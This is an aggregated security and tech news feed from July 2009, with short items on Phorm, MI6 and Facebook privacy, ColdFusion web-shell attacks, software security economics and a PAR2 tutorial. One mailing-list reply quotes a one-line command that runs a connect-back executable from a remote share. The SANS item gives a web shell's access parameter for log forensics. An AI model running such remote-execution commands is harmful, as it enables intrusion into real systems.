Ambersail Security Roundup

On Air: 'Off The Hook, July 1, 2009'

Mon, 06 Jul 2009 06:41:01 +0100

Emmanuel Goldstein/Off The Hook, July 1, 2009/Off The Hook

Why Sarah Palin is no lightweight

Mon, 06 Jul 2009 06:32:47 +0100

NOTE: I will strive to be politically balanced in this post, and report the facts, not push an agenda. It is fine if you do not agree with me, but please check the facts for yourself. The past few days, Sarah Palin has grabbed the headlines with her resignation as governor of Alaska. The battlelines are [...]

Breakfast briefing: BT ditches Phorm and Microsoft eyes your medical records

Mon, 06 Jul 2009 06:00:00 +0100

• Controversial advertising company Phorm has been dealt another blow after main partner BT decided to pursue , as we report in the Guardian. More backstory on our Phorm page.

• The Conservatives plan to let patients move their official medical records to private companies such as Microsoft and Google, according to the Times.

• Some post-weekend reading to get your brain busy on a Monday morning:
First up, Chris Anderson's new book Free is certainly sparking off some interesting conversations, including a contribution from Mark Cuban, who says "When you succeed with Free, you are going to die by Free"; Here's an intriguing article from Fast Company about how Amazon is tapping its inner Apple. Finally, this New York Times article on the new way to do public relations in Silicon Valley has the likes of Techcrunch and Robert Scoble gabbing, though they miss the crucial paradox: that the crucial PR act here is actually getting the NYT to write about them.

You can follow our links and commentary each day through Twitter (@guardiantech, or our personal accounts)

guardian.co.uk © Guardian News & Media Limited 2009 | Use of this content is subject to our Terms & Conditions | More Feeds

Webvan in the Clouds?

Mon, 06 Jul 2009 05:46:03 +0100

Thin Margins, Change and Differentiation As we watch the explosion of cloud events, press releases and panels is anyone getting a sense of déjà vu all over again? It wasn’t that long ago when Webvan was going to transform the grocery business with new technology and processes. After a flurry of announcements and expansions we learned that [...]

Pimp an electric scooter (in progress..)

Mon, 06 Jul 2009 05:41:26 +0100

A very nice friend gave me this broken electric scooter (probably just a dead battery). Since i have always wanted one from the moment i heard about them i was very happy! Doesn't matter if it's broken because that will just give me a good reason to take it apart and rebuild it like I want it.

I fo...

By: djupblue

Volatility Call for Bugs

Mon, 06 Jul 2009 05:27:47 +0100

Volatility Call for Bugs: Jesse Kornblum, our favorite geek raised by wolves, has graciously agreed to help prepare the next release of Volatility. Please take some time and report any bugs you may have encountered. It’s great to see people willing to step up and contribute back to the community! Remember, Volatility is powered by the people! Shouts to Jesse!

Re: One Click Ownage [White Paper and Scripts]

Mon, 06 Jul 2009 05:22:22 +0100

Posted by Fredrick Diggle on Jul 5

Or just

'start \\DiggleSec.com\fredrick\connectback.exe'

would have also been acceptable.

But Fredrick is sure that your 20 page write-up was fantastically entertaining.

On Fri, Jul 3, 2009 at 5:50 AM, Ferruh Mavituna<ferruh_at_mavituna.com> wrote:
> This is a different and more...

Oracle may cut up to 1,000 European jobs

Mon, 06 Jul 2009 05:04:30 +0100

Oracle may lay off between 850 to 1,000 European employees, according to the French union CFDT. The European Works Council and the Comité d'Entreprise France were notified by Oracle on Monday and Tuesday that 250 positions would be eliminated in France, the union wrote on its blog. Oracle employs 1,600 in France and 17,000 in Europe, the union said. Oracle had no comment, a company spokeswoman for Oracle Europe said. The union said it has been informed by the company of plans to cut workers due to forecasts that growth in Europe would be slower than expected, according to the CFDT. That somewhat goes against comments made by the company when it reported its latest quarterly results. Oracle said it was especially pleased with its results in Europe and highlighted 5 per cent growth in the company's applications business

Marc Andreessen launches new venture fund

Mon, 06 Jul 2009 05:00:00 +0100

$300 million Andreessen Horowitz fund to back companies large and small, but only Internet-focused.

A Computer Forensics Process Tutorial

Mon, 06 Jul 2009 04:51:33 +0100

By Bozidar Spirovski , CISSP, MCSA, MCP Computer forensics is currently a very popular term, and a lot of conferences are organized around it, or books written on the subject. This, together with the popularity of the CSI series, brings an aura of certain very special, even magical steps that forensics teams use. In reality, the computer forensics job is a standard process, and every one of us does parts of the process when we debug our computers. So, here is a simple tuto

On Facebook, a Spy Revealed (Pale Legs, Too) - NYTimes.com

Mon, 06 Jul 2009 04:06:17 +0100

On Facebook, a Spy Revealed (Pale Legs, Too) - NYTimes.com

Low impact living in Wales

Mon, 06 Jul 2009 04:00:09 +0100

Looking to live simply and in harmony with the land they would raise their children on, one couple in Wales set out to build a hand crafted house on a modest budget.

The basic construction is a series of vertical posts in an oval, the tops of which are connected with horizontals. This ring of horizontal pieces makes what is conventionally referred to as a roofplate or wallplate. The horizontals are 'tennoned' into the posts although a simpler alternative is to 'half lap' the horizontals and use a metal bar / big nails to fix the joint on top of the post.

Their site has lots of details about the construction, theory behind the build, and ideology surrounding their choices. The photos page has full sized images of all the pictures on the site.

Read more | Permalink | Comments | Read more articles in Remake | Digg this!

Administrivia: Happy Fourth of July! Also upgrading site for our Tenth Anniversary !

Mon, 06 Jul 2009 03:45:02 +0100

Hello folks !! For those of you in the USA, I hope that you have had a good Fourth of July(and Canadians enjoyed Canada day on July 1) and didn't each to much BBQ.

Sorry for the shortage of updates over the last few days, but I've been a bit busy recently and have also been working on upgrading the site.

Besides being the birthday of the United States, July 4th was also the 10th Anniversary of Privacy Digest. I started the site back in 1999 after migrating some material from an old general blog. I had hoped to have the upgrade completed by the Fourth, but it turned out to be a bit more involved than I had originally expected.

It is also two major parts. The first was upgrading the base CMS that I use, and the second part will involve adding some interesting new functionality that I think you will appreciate. I don't have much time this week, but I hope to have the base CMS upgraded in the next few days. I will then start phasing in the new features over the rest of the month.

Re: NSE argument table syntax

Mon, 06 Jul 2009 03:18:10 +0100

Posted by David Fifield on Jul 5

On Sat, Jul 04, 2009 at 10:39:23AM -0300, Joao Correa wrote:
> Here follows the patch fixing whois.nse and dns-zone-transfer.nse to
> enable the use of the new arguments table syntax.

The only changes I would make to these is to try the new syntax before
the old syntax, and add comments...

Twitter Weekly Updates for 2009-07-05

Mon, 06 Jul 2009 02:15:00 +0100

@flibeau welcome in reply to flibeau # Reading: “Yoggie New Secure USB Flash Drive”- Embedded antivirus and 256-bit AES hardware based encryption ( http://bit.ly/9Fh2L ) # blown away by @netwitness NextGen architecture and data flow + seamless integration with @arcsight . Great ! # @iboldizsar lucky you ! Enjoy in reply to iboldizsar [...]

Battery desulfator

Mon, 06 Jul 2009 02:00:04 +0100

Hack a Day favorite [Mikey Sklar] is back with a new project. Mini-D is a battery desulfator. If a 12V lead-acid battery sits with a voltage below 12.3V, sulfur crystals will begin to form on the lead plates. This crystal growth increases the internal resistance and eventually makes the battery unusable. A battery desulfator sends [...]

Developing Proposal Financial Models

Mon, 06 Jul 2009 01:46:46 +0100

The purpose of this task is to translate the estimates and schedule into the costs of delivering the proposed solution and to determine the price for the solution as it is described in the proposal. Identifying Costs Before beginning this step, ens...

pOg productions added a video

Mon, 06 Jul 2009 01:24:55 +0100

pOg productions added a video

Terror law boss backs Gary McKinnon's fight: New support for Asperger's victim facing extradition

Mon, 06 Jul 2009 01:10:24 +0100

Affront to justice: Lord Carlile says Parliamentarians have a duty to protect the vulnerable and eccentric, such as Gary McKinnon The Home Secretary has been warned by his own adviser on terror laws not to allow the extradition of autistic computer hacker Gary McKinnon.

More on ColdFusion hacks, (Sun, Jul 5th)

Sun, 05 Jul 2009 23:00:59 +0100

Thanks to our readers Adam and Oobi we received some additional information regarding recent ColdFusion hacks.

As I wrote in the previous diary (http://isc.sans.org/diary.html?storyid=6715), the attackers are exploiting vulnerable FCKEditor installations, which come enabled by default with ColdFusion 8.0.1 as well as some other ColdFusion packages.

The first thing the attackers do is uploading a ColdFusion web shell a script very similar to ASP.NET or PHP web shells we've been writing so much about. The web shell I analyzed is very powerful and seems to be recent according to the date in the script it was released on the 23rd of June by a Chinese hacker Seraph.

The script has a simple authentication mechanism it verifies what the URL parameter action is set to, as can be seen in the screenshot below:

If the parameter action is set to seraph, the user can access the web site, otherwise the script just prints back seraph. In other words, the URL the attacker accesses after uploading the script will look something like this: http://www.hacked.site/uploaded_file.cfm?action=seraph

A nice thing (for us doing forensics, at least) is that you can now grep through your logs for action=seraph to see if you have been hacked with the same script. Keep in mind that this is not a definite test, of course, since the action variable's name can be easily modified.

--

Bojan

Top Five Reasons to Attend Black Hat USA

Sun, 05 Jul 2009 22:31:00 +0100

This is an updated post from last year, with a similar post title of Top 5 Reasons to Attend Black Hat USA. So what makes Black Hat USA so good, and why do we keep coming back? Here are our top five reasons to attend Black Hat USA. Excellent Presentations – There are eight session [...]

Linux console RSS reader Snownews

Sun, 05 Jul 2009 22:03:09 +0100

I read a lot of news. One of the many ways I read news is via RSS feeds. If you don’t know, RSS stands for Really Simple Syndication. What an RSS reader does is collect summaries of news feeds from your favorite sites and places them in a simple, easy to read format. Most RSS [...]

Paimei – Reverse Engineering Framework

Sun, 05 Jul 2009 21:46:00 +0100

http://code.google.com/p/paimei/

Rochto’s…excited about the Duran Duran concert tonight.

Sun, 05 Jul 2009 21:43:08 +0100

Title: Rochto’s…excited about the Duran Duran concert tonight.

Body:

And I thought I was chatty on social media. Turns out she just needed the right topic, clipped from her Facebook:

Rochelle Conway Toulouse What a fabulous weekend! Awesome fireworks displays (yes that's multiple) in our very own Big Rock Ridge!!! Tonight - More awesomeness. Time to be a teenager again. Going to see my ALL TIME FAVORITE BAND EVER - DURAN DURAN!!!! I love you John, Simon, Nick, and Roger!!!!
--
Okay - I can't post about this enough. I'm hitting a nostalgia trip. Got the DD DVD Greatest Hits blaring in the background. I still remember when I first fell in love w/the band. I was 11 and saw the music video "The Reflex" on my best friend's HUGE projection TV - Ah the days of MTV. Yes...I was a late Duranie bloomer. Didn't become a fan until "Seven and the Ragged Tiger"...but it wasn't too soon after that I had the 2 previous albums: “Duran Duran” and “Rio”.
--
Then "Arena"!!! Oh how so many times I would go to the video store to rent "Blue Silver" on VHS (which now, yes, I own on DVD). And staying up until 5:00am to watch the premier video of "Wild Boys" on MTV. Remember Friday Night Video??? Oh the days - I'd stay up late just to see DD host! My bedroom wall was surrounded w/DD posters - I mean ALL walls including the ceiling. Teeny bop magazines and Japanese imports!!!
--
I'm so blessed to have married a fellow Duranie. We were at the same "Big Thing" concert at Arcadia in Dallas when we were 15!!! And I have been so ever blessed to have seen DD perform every year in Seattle since we moved here in 2003. Not to mention the concerts in Dallas!!! I feel 15 all over again!!!
--
Duran Duran - God Bless you for still touring!!! And for picking Seattle this year as one of the few "select" cities. Looking forward to an amazing concert!!!!

Category: Rochto

Published: 7/5/2009 1:43 PM

Modified: 7/5/2009 1:43 PM

Modified By: Stepto

Created By: stepto@stepto.com

Secret Service tells UK Government not to Publicly Disclose Data Breaches

Sun, 05 Jul 2009 20:20:00 +0100

Are you wondering why there haven’t been any UK Government Department Information breaches making the news headlines in recent months? Has our government departments resolved their poor Information Security Management and poor security cultures? Has other topics such as swine flu and dodgey MP expenses claims kept government data breach headlines out of the press? I would love to think UK Government Departments have cleaned up their Information Security Act, as I know serious efforts are being made, however we can't really be sure government have stemmed their poor information management tide, as I heard another reason which goes to explain why the once steady drip of media coverage of government departments data breaches has come to a halt.

I don’t want to name any names, but I heard a member of government committee working on the Digital Britain report say, government departments had been advised by a UK security service department to stop publicising data breaches, because it is letting our enemies know our weaknesses. If this is indeed true, I have to say I really don’t agree with this sweeping under the carpet approach, for one the cat is out already out of the bag regarding our government track record on security, tens of millions of records have been lost that we know about, so I think our enemies already know about our weaknesses!

I am a supporter of the public disclosure of data breaches where the public's personal information is involved, to the extend I would like to see UK laws passed to ensure all organisations, both within the private and the public sectors, disclose any data breaches where citizen personal information has been actually or potentially compromised. The reason we need such laws is I feel it is the only real way entire industries and individual organisations will be bothered enough to raise their information security to the required standards, and better secure all our personal information. I believe it should be a fundamental right that we are informed if (more like when) our government or indeed a private company, loses our personal information, placing us at increased risk of serious cybercrimes like identity theft, which is the UK’s fast growing crime. Only by holding government department heads and business senior directors to account for such breaches, will organisations truly recognise the importance of properly securing our personal information, which after all we have entrusted in their care.

The Curious Case of Asset Valuation

Sun, 05 Jul 2009 20:02:44 +0100

I recently had a discussion with someone about how to do asset valuation for risk assessments. It was a good discussion that prompted me to share with you. The whole concept of asset valuation (as it exists for information security) is predicated on the assumption that acquisition cost is a good constituent factor of security [...]

Into the Breach – Audio Series – The Introduction

Sun, 05 Jul 2009 19:43:04 +0100

Welcome to the audio series of Into the Breach: Protect Your Business by Managing People, Information and Risk (click this link to learn more about this book). This series, underwritten by Configuresoft, now part of EMC, is the full and unabridged audio version of Into the Breach, written by Michael Santarcangelo and read by the [...]

What's new on phoneyc (3)--- Mid-term Evaluation

Sun, 05 Jul 2009 18:41:19 +0100

�

Mid-term Report on PHoneyC GSoC project 1

Info:	See <https://www.honeynet.org/gsoc/project1> for project details.
Author:	Zhijie Chen (Joyan) <czj.pub@gmail.com>
Mentor:	Jose Nazario
Description:	Mid-term Report on PHoneyC GSoC project 1. This report describes what I have done on the PHoneyC's libemu integration for shellcode and heapspray detection during the first half of the GSoC. Till now, the main ideas on this feature has been fast-implemented (actually I mean poor coding style) and the whole flow works well, with some code rewriting and performance optimization needed in the future.

GSoC Project #1 - Develop and Improve PhoneyC

What's new on phoneyc (3)--- Mid-term Evaluation

Sun, 05 Jul 2009 18:41:19 +0100

�

Mid-term Report on PHoneyC GSoC project 1

Info:	See <https://www.honeynet.org/gsoc/project1> for project details.
Author:	Zhijie Chen (Joyan) <czj.pub@gmail.com>
Mentor:	Jose Nazario
Description:	Mid-term Report on PHoneyC GSoC project 1. This report describes what I have done on the PHoneyC's libemu integration for shellcode and heapspray detection during the first half of the GSoC. Till now, the main ideas on this feature has been fast-implemented (actually I mean poor coding style) and the whole flow works well, with some code rewriting and performance optimization needed in the future.

GSoC Project #1 - Develop and Improve PhoneyC

SCO's Proposed Amended Complaint Against AutoZone, as text - Updated - Chart

Sun, 05 Jul 2009 18:31:00 +0100

As I mentioned earlier, SCO is asking the court [PDF] to let it amend its complaint against AutoZone, which is probably the only way it can go forward unless the appellate court rules in SCO's favor -- and then a jury does too, down the road apiece. We have the motion and the proposed amended complaint as text now.

A normal litigant would just fold up shop and call it quits, now that Novell has been ruled the owner of the copyrights that SCO was suing AutoZone about. Not SCO. It is addicted to litigation, I guess, or someone is making them do it.

Like the Devil.

Just kidding around. I don't know why they do what they do. But whatever the reason, now that the judge has told them to get a move on with this case and wrap it up as opposed to waiting until the appeal in Novell is over, rather than admit they had no case, they would like to morph the complaint to be about contract breach and more about OpenServer.

Is that not totally the SCO you've come to know?

Why phishers target low value accounts

Sun, 05 Jul 2009 18:27:20 +0100

PCWorld talks about a recent phishing scam on Twitter.� The question in the article is: In this instance, it appears the site primarily used compromised accounts to spread the phishing links further. What, if any, broader goal was behind the effort is not yet clear. I’ve posted about this before, but it seems prudent to talk about [...]

The 10 dumbest mistakes network managers make

Sun, 05 Jul 2009 17:00:00 +0100

When you look at the worst corporate security breaches, it's clear that network managers keep making the same mistakes over and over again, and that many of these mistakes are easy to avoid.

Connections

Sun, 05 Jul 2009 16:20:37 +0100

Posted by Dave Aitel on Jul 5

You forget, if you are lucky enough to spend all your time in the same
office with "Senior Security Researchers" ( or traveling to conferences as
some of us do) that many hackers at conferences have not met another hacker
face to face in a long time. Face to face is very high...

Photos: Spiral Jetty, Robert Smithson's wondrous earthwork

Sun, 05 Jul 2009 16:00:00 +0100

On the north side of the Great Salt Lake, far from civilization, is one of the grandest pieces of large-scale art in the world. Made up of volcanic basalt, Spiral Jetty is a Road Trip 2009 highlight.

Business Cases For Software Security Initaitives

Sun, 05 Jul 2009 14:30:00 +0100

I covered the topic of business cases for software security initiatives in the past in articles (ISSA Journal 2006, In-secure Magazine 2008) as well as in presentations to security conferences (Black Hat in 2006 and OWASP in 2008). When asked how I can make the business case for software security that's how I articulate my answer:
1) Approach the business case from information risk management perspective
2) Quantify software security failure costs with software engineering data
3) Justify software security expense with cost vs. benefits analysis
4) Adopt a long term investment strategy

Building software security into the organization’s software engineering and information security practices is best accomplished by following software security maturity models (e.g. BSIMM or SAMM) as well as by adopting frameworks to build security in the SDLC. Software security frameworks integrate software security activities in the SDLC along with other organization information security processes such as information risk management, defect management, patch management, training and awareness.

A pre-requisite for the software security initiative business case is the availability of the organization risk data that include risk management, vulnerability metrics as well as of software engineering data such as defect management. From the software engineering perspective for example, the assumption is that your organization already measures the costs for fixing software security failures due to known vulnerabilities as well as the cost of fixing the ones resulting from incidents/exploits. Total software security failure costs include both the cost of business impact in exploiting failures (e.g. cost of a vulnerability exploit that caused harm to the organization such as denial of service) as well as the cost to fixing a known defect due to a security issue, being a security bug, a design flaw or a mis-configuration.
The problem of the security metrics is that implies that the organization software and information security practices are matured enough to use data from risk management, fraud management, vulnerability assessment, software engineering/project management, quality assurance measured and correlated. A metrics that correlates software engineering and information risk management disciplines for example, not only implies that development teams have already started adopting security in the SDLC (e.g. by using processes such as MS SDL, OWASP CLASP, Cigital ™TP) but also that they have started working together with security teams to measuring software security risks and manage them through the SDLC.
Basically the business case for the software security initiative needs the data that the initiative is suppose to provide. In essence this is a chicken vs. egg problem you can only manage what you measure and you need metrics to make the business case for.
From information security perspective, the business case for software security need to start from the organization's information risk management data, business impact analysis and correlate application vulnerabilities as critical when these correlate to business impacts.
For this reason (i.e. the lack of organization software security data) the business case for software security is one that is hard to make. So what are the alternatives for the business case in absence of such risk data ? The answer is you need to make assumptions on software engineering costs and the cost of fixing vulnerabilities as well the financial losses that vulnerability exploits might cause.If the business case needs to be made by engineering and software development teams for example, you can assume a software engineering perspective and refer to public studies that analyze the cost of "software defects”. A NIST study on the economic impact of insecure testing for example shows that cost of fixing defects is 100 times more expensive during system testing than coding. You can localize this metrics to how much it would cost to your organization to fix vulnerability from quality/defect management perspective. Assuming your organization had adopted a web application penetration testing process, some vulnerability metrics can also be used and correlated with the cost of fixing them.

If your organization application security and information security practices are reactive rather than proactive, you can refer to the cost of producing security patches (e.g. hotfixes) to fix vulnerabilities. In absence of company data you can make assumptions such as that the cost of engineering, developing, testing and deploying a patch to your vulnerable software/web application is let say $ 10,000: it is realistic to assume that the fixing this patch earlier in the SDLC would have cost you 10% of patching costs and made saving your company 90 % of overall patching costs (e.g. 9,000 $)

But just including patching costs is not conservative enough for a real estimate of total software security failure costs: you need also to include the business impact of exploits such as either the risk of exploiting a known vulnerability or an unknown vulnerability (e.g. Zero Day) such as the ones exploited and do not follow responsible public disclosure causing the organization intangible costs.. Even in absence of a vulnerability exploit it is still important to factor the cost posed by the business impact to the organization caused by the exploit of the vulnerability. In the case of intangible costs for example what is the intangible cost of cross site scripting vulnerability publicly disclosed on XSSEd.com site? How much is the cost of reputation damage to have such vulnerability publicly disclosed? Any public published vulnerability can cause intangible loss to company reputation, the company brand and the franchise and affect customer confidence on the company product and services.
Would intangible costs by themselves justify the existence of a responsible disclosure process to engage security researchers that have found your site vulnerabilities: YES. Would this justify fixing all known vulnerabilities before going into production with a penetration test? YES

But to really factor software failure costs as the business impact of exploiting a vulnerability it is important to correlate attacks with vulnerabilities and the business impact that cause. The recent data from the Web Hacking Incident DB that correlates public information from security incidents with web application attack vectors for example has SQL injection as #1 (19% of all attacks) that includes manual targeted attacks as well as mass SQL injection bots. From the perspective of attack vs. risk prioritization SQL injection vulnerabilities represents the ones that most likely will be exploited to cause harm to your organization and are the ones that would produce high failure costs (e.g. use for break into authentication, upload malware, denial of service, un-authorized access to sensitive data), when mitigated, SQL injection vulnerabilities would provide the most benefit in terms of mitigating business impacts.Since the SQL injection vulnerabilities root cause is coding such as using concatenated SQL statements instead of store procedures or prepared statements, fixing SQL injection vulnerabilities in the code alone would make the case of adopting secure code reviews.

Most organization's directors of technology and security try to sell technologies and new initiatives to high management with the sales pitch of "money for the bang" MFTB. The MBTB business case answers the basic question: if I spend that much on a security technology or process what is the benefit for security ? In technical terms this means doing a Cost vs Benefit Analysis (CBA). CBA can be used in security to correlate the total cost of security to increased information or software security assurance. Dan Geer covers well this analysis as related to data security in his book "Economics and Strategies of Data Security". By analogy, in the case of software security, "money for the bang" decision spending need to take into account all failure costs such as the total cost of failing as business impact as well the total cost of finding, fixing, testing and deploying the security defect. The cost of software security failure can be compared against the "anticipation costs" that are the costs incurred in proactively spending in software security initiatives. The general law is that failure costs decrease exponentially as anticipation cost raise From risk management perspective this means that the overall software security costs decrease up to a minimum and then would raise again when you'll spend more money on anticipating the failure then of what actually the failure might cause. . You will reach an optimal where more spending in anticipation cost is not worth it. This optimal spending for anticipation costs is about 40% (to be exact 37% according to Gordon and Loeb research: The Economics of Information Security Investment) of the failure costs. According to these figures it is fair to assume that optimal spending for defensive coding is 37% of what your software failure costs are. Assume for example software security failures cost is $ 10 ML it would be optimal to spend as much as $ 3.7 ML in acquiring software security tools and technology, develop new software security process as well as in new software security training activities.

Assume your organization has fraud data that can be correlated to the e-commerce channel this data can also be used to make this business case: a spending of as much as 37% of the fraud costs in application and software security initiatives can be justified.

In the case of fraud data related identity theft occurring via the web channel, you can factor the overall fraud related to data loss potentially impacting your organization and consider that 14% of all publicly reported data loss incidents occur via the web channel according to the data collected from datalossdb.org. Assuming 2003 FTC data the potential loss per identity theft incident is $ 655 per incident. Assume you are serving a population of 4 million customers, the potential loss would be of $ 2,6 Billion and with probability of identify theft occurrence of 4.6 % (also FTC data) the projected loss would be $ 120 ML for which 14% or $ 16 ML would be the cost of data losses via the web channel. With this assumptions on data loss impact, an information, application and software security program aimed to protect customer data access via the web channel that cost as much as $ 16 ML would be justified for a company with a customer base of 4 million on-line customers.

A quantitative risk assessment can be used to determine the extent on which a software security initiative can reduce risk from potential losses. The correlation has to take into account the probability of the event and the loss that the event can cause. This is difficult to quantify in general for software security issues since assumes a cause-effect between vulnerability exploit and financial impact. Nevertheless it can be used for rought estimates, assume a web application that delivers banking services for example and that the loss caused by an event such as denial of service impact on-line transactions for 3 million customers with an average of $ 20 per transaction: the loss per single DOS event (SLE) is $ 60 ML. Assume that the probability that a new SQL injection vulnerability would cause a denial of service is 30% (Annualized Rate of Occurrence) then the Annual Loss Expected (ALE) is $ 1.8 ML. If the cost of the new security countermeasures that will stop the security incident is less than $ 1.8 M than the organization should implement it.Assume the countermeasure in this case is the total cost of secure code reviews, you need to factor the cost of tools and technologies/APIs (e.g. source code analysis and penetration tools), of the security engineering process (e.g. documentation and metrics) as well of software security training and awareness for developers. The tools and technologies need to include the Total Cost Of ownership that is both the cost of acquiring and maintaining the technology.

Besides cost vs benefit analysis and quantitative risk assessment, the return of security investment (ROSI) can be used to make the software security business case around effectiveness of a software security initiative. ROSI answers the question if I spend 100K in software security initiative do I save more money by fixing defects with a penetration test, secure coding or threat modeling. Again this is where the metrics is essential:making the case with ROSI assumes you already collect SDLC data that show how much it cost to perform software security per each phase, the number of issues being identified at each phase and the how many are fixed at each phase you can make the business case for an activity vs another. Otherwise you can reference public study of ROSI from Kevin Soo Study " for every 100K spent on software security, 21K are saved by doing application threat modeling during design, 15 k are saved by doing source code analysis and 12 k are saved when defects are found with penetration tests. Overall the earlier you invest in security the greater the return.

Report: Problems stymie U.S. cyberspy protection

Sun, 05 Jul 2009 14:13:00 +0100

Twin obstacles of technical problems and privacy issues are holding back the overarching system created to protect the federal government's computers from cyberspies, according to The Wall Street Journal.

"The latest complete version of the system, known as Einstein, won't be fully installed for 18 months, according to ...

Sysadmin Sunday: Guard against file corruption with PAR

Sun, 05 Jul 2009 14:00:00 +0100

Introduction:
Bit rot, File corruption, partial file transfer, call it what you will, digital transmission mediums some times fail and you are left with a corrupted fragment of data if any at all. In the case of large files in which re-transmission would take hours or days, this is a tough situation.

PAR uses a RAID like technique to salvage corrupted files in most cases only needing to obtain files containing restore information that are a fraction of the size of the original file.

This article is intended for people with basic to intermediate understanding of a un*x style operating system.

-=-=-=-=-=-=-=-=-=-=-=-=-=-

Table of contents:
1. PAR and the Reed-Solomon error correction algorithm
2. Available applications based off of PAR
3. Examples
4. Informative resources

-=-=-=-=-=-=-=-=-=-=-=-=-=-
1. PAR and the Reed-Solomon error correction algorithm

The Reed-Solomon algorithm was developed in 1960 by Irving S. Reed and Gustave Solomon. It is used in many technologies such as CD's, BlueRay, DSL Modems, RAID6 and more. This method of error correction is used to protect against certain forms of media defects or data transmition errors.

The PAR utility was developed by Tobias Rieper and Stefan Wehlus for the purpose of recovering corrupted files and file fragments from Usenet posts with out needing to download the file all over again. Later, to compensate for some limitations of PAR, the PAR2 specification was developed by Michael Nahas and Peter Clements. Clements then wrote some of the first PAR2 applications.

A simple way of explaining what PAR does is that it takes the original source files then applies the mathematical algorithm to it which contains a sort of processed description of what that file looks like. Then lets say you send someone a file but for some reason the transmission fails mid way through the file transmission. All that needs to be done is to download the results of the mathematical operation (which are significantly smaller than the original file) and run the par utility to apply the math to the file fragment. Par can fill in the blanks using the algorithm and restore the the file.

2. Available applications based off of PAR
There is of course the fore-mentioned open source application written by Peter Clements et all. There are a slew of other PAR clients for Mac, OS 9 and 10, Windows, Linux, BSD and more. Though the PAR1 specifications are incompatible with the PAR2 specification most clients support both formats side by side. For a detailed list of PAR compliant projects check out the Parchive sourceforge website. If you are using Linux, you can either download a Linux rpm or source tarball from the sourceforge site . Or use a package system such as apt-get to download it from your distributions package archives.

3. Examples
In this example I am using Ubuntu Linux.

This will require the Ubuntu Universe repository. You can uncomment this in "/etc/apt/sources.list" using "sudo vi /etc/apt/sources.list".
Then update your sources using "sudo apt-get update".
Finally get the par2 package using "sudo apt-get install par2" .

Now lets test par2 to see if it can recover a file:

Using dd create a 10MB test data file from /dev/zero "dd if=/dev/zero of=/tmp/testdata.bin bs=1024 count=10240"
Then create our par2 file and recovery blocks: "par2 create testdata.par2 testdata.bin"
Now im going to copy the original data to a different name then make some changes to it.
Then I run "par2 verify testdata.par2 testdata.bin"
par2 tells me that I need one recovery block to repair the file. (* during the create process par2 created several repair blocks. Since par2 over-samples, I can use the either the largest repair file or a combination of the smaller files for the same effect.) In this case I just need to have the repair block file called testdata.vol000+01.par2 in the same directory.
I then type in "par2 repair testdata.par2 testdata.bin" where it then reports that the file has been repaired.

4. Informative resources
Clements,Peter Gallagher,Ryan Nahas,Mike et. all. "Parity Archive Volume Set: File
Specification, Clients, and Related Resources" (Accessed July 2009)
http://parchive.sourceforge.net/

Wikipedia.org "Reed-Solomon Error Correction" (Accessed July 2009).
http://en.wikipedia.org/wiki/Reed%E2%80%93Solomon_error_correction

Wikipedia.org "Parchive" (Accessed July 2009).
http://en.wikipedia.org/wiki/Parchive

Facebook, Mail on Sunday and Sir John Sawers incoming Chief of the Secret Intelligence Service MI6

Sun, 05 Jul 2009 13:04:54 +0100

The Mail on Sunday has another exclusive story about an aspect of data privacy and security, which are two ides of the same coin:

MI6 chief blows his cover as wife's Facebook account reveals family holidays, showbiz friends and links to David Irving

By Jason Lewis
Last updated at 11:43 AM on 05th July 2009

The new head of MI6 has been left exposed by a major personal security breach after his wife published intimate photographs and family details on the Facebook website.

Sir John Sawers is due to take over as chief of the Secret Intelligence Service in November, putting him in charge of all Britain's spying operations abroad.

But his wife's entries on the social networking site have exposed potentially compromising details about where they live and work, who their friends are and where they spend their holidays.

Amazingly, she had put virtually no privacy protection on her account, making it visible to any of the site's 200million users who chose to be in the open-access 'London' network - regardless of where in the world they actually were.

There are fears that the hugely embarrassing blunder may have compromised the safety of Sir John's family and friends.

[...]

Spy Blog does not often find itself in agreement with the creepy authoritarian NuLabour Foreign Secretary David Miliband, but his comments via the BBC are, at one level true:

But Foreign Secretary David Miliband told the BBC's Andrew Marr programme: "Are you leading the news with that? The fact that there's a picture that the head of the MI6 goes swimming - wow, that really is exciting.

"It is not a state secret that he wears Speedo swimming trunks, for goodness sake let's grow up.

UPDATE - The BBC did Miliband yet another favour by making this quotation seem more coherent and pithy than it actually was in the video clip.

This Sir John Sawers affair is reminiscent of the similar one about Alex Allan, Chairman of the Joint intelligence Committee when he was appointed back in November 2007

Alex Allan is now Chairman of the Joint Intelligence Committee - his home address, phone and mobile phone number are...

Is there nobody in Whitehall who bothers to check the world wide web for such personal details before a new senior appointment is made ?

Apart from the location details of the London flat, was there really anything sensitive from a security point of view ? Photos of his family and friends are inevitable, as he has been in the public eye as a very senior diplomat.

Since he is currently still the UK's representative on the UN Security Council, and is living in New York, he would anyway probably be looking to move to a larger house or flat in London by November, when he takes up his post as Chief of the Secret Intelligence Service.

If one were to be very cynical, one might suspect that by allowing your personal details to be revealed by members of your family via the web, it means that once you are appointed to a "sensitive" official position, you can then get the Government to foot the bill for a new house or apartment for "security" reasons.

This Mail on Sunday story does, however, raise the same questions which we asked about their previous story about Assistant Commissioner Bob Quick / private hire cars business story back in December 2008:

For how much longer will the UK media and bloggers be able to freely investigate stories like the Bob Quick anti-terrorist policeman / family wedding cars business story ?

Were the Mail on Sunday or Facebook threatened by the Foreign Office or by MI6 etc. with the new

58A Eliciting, publishing or communicating information about members of armed forces etc

(1) A person commits an offence who--

(a) elicits or attempts to elicit information about an individual who is or has been--

(i) a member of Her Majesty's forces,

(ii) a member of any of the intelligence services, or

(iii) a constable,

which is of a kind likely to be useful to a person committing or preparing an act of terrorism, or

(b) publishes or communicates any such information.

which is now fully in force ?

XBox 360 Laptop Version 5

Sun, 05 Jul 2009 12:49:05 +0100

Ben Heck has just finished his latest hack which is version 5 of the XBox 360 Laptop. This time it looks even more polished than the previous versions. Unfortunately the laptop is spoken for so if you want one of these special units you may have to shell out some big bucks. Via: Techeblog "A few months [...]

MI6 chief's wife puts security at risk on Facebook

Sun, 05 Jul 2009 08:50:58 +0100

According to media reports, the incoming head of the British Secret Intelligence Service (better known as MI6) has had personal information about himself and his family exposed on Facebook, after his wife's Facebook account was discovered to be potentially wide open for 200 million people to view. The Mail on Sunday claims that the wife [...]

Generations Of Communications and How They Influence Business and Products

Sun, 05 Jul 2009 07:57:26 +0100

Part 1: One of the reasons I enjoy creating software is that I'm fascinated by researching and understanding users of the technology we create. I sometimes refer to myself as a software anthropologist. That's part of why I also enjoy...

How Important is an IP Address?

Sun, 05 Jul 2009 06:41:03 +0100

